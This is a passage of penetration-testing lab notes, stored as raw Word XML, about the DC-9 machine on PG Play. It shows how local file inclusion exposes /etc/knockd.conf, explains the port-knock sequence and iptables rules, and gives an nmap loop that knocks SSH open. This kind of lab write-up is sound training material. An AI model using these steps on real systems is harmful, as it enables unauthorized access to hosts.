          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036B9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1158">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">DC-9</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, they had LFI and they checked </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/knockd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036BA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036BB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2679700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="282" name="image280.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image280.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId115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36BC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4252913" cy="2290030"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="38" name="image39.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image39.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1160"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4252913" cy="2290030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1291"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The bottom picture is just the original picture but in a better format</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036BE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036BF">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explaining the  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/knockd.conf </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036C0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036C1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TLDR:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Just look at the "openSSH" section and look at the "sequence" which will tell you what sequence to use to open SSH. Once you do that, SSH will open. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036C2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036C3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036C4">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[options]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036C5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This section sets global options for knockd.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036C6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="877"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UseSyslog → tells knockd to log events (like knocks detected, commands run) to syslog for system-wide logging.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036C8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036C9">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[openSSH]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036CA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the named rule block that defines what to do when you want to open SSH.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="496"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sequence = 7469,8475,9842</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> →</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="496"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The correct sequence of TCP ports you need to "knock" on, in order, to trigger the open command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="496"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">seq_timeout = 25 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="496"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Maximum allowed time (in seconds) to complete the full knocking sequence. If you take longer, the sequence is invalid.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="496"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="496"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Command to run when the sequence is detected.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="496"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This inserts (-I) a rule at the top of the INPUT chain to allow (ACCEPT) TCP traffic (-p tcp) from the knocking IP (%IP%) to port 22 (SSH).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="496"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Effectively: open SSH for the knocking host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="496"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tcpflags = syn</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> →</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="496"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Only count packets with the SYN flag (the first step of a TCP handshake), so random packets or scans don't accidentally trigger it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036D5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036D6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036D7">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[closeSSH]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036D8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This defines the sequence to close SSH again.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036D9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="730"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sequence = 9842,8475,7469 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="730"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse knock sequence to shut SSH back down.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="730"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">seq_timeout = 25</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> →</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="730"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Same time limit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036DD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="730"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036DE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="730"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Command to remove (-D) the firewall rule that was previously inserted, effectively closing SSH.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="730"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tcpflags = syn </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036E0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="730"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Same as above, count only SYN packets.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036E1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036E2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036E3">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we can write a bash script to open SSH:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="196"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for X in 7469 8475 9842 ; do nmap -Pn — host-timeout 201 — max-retries 0 -p $X $IP; done</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
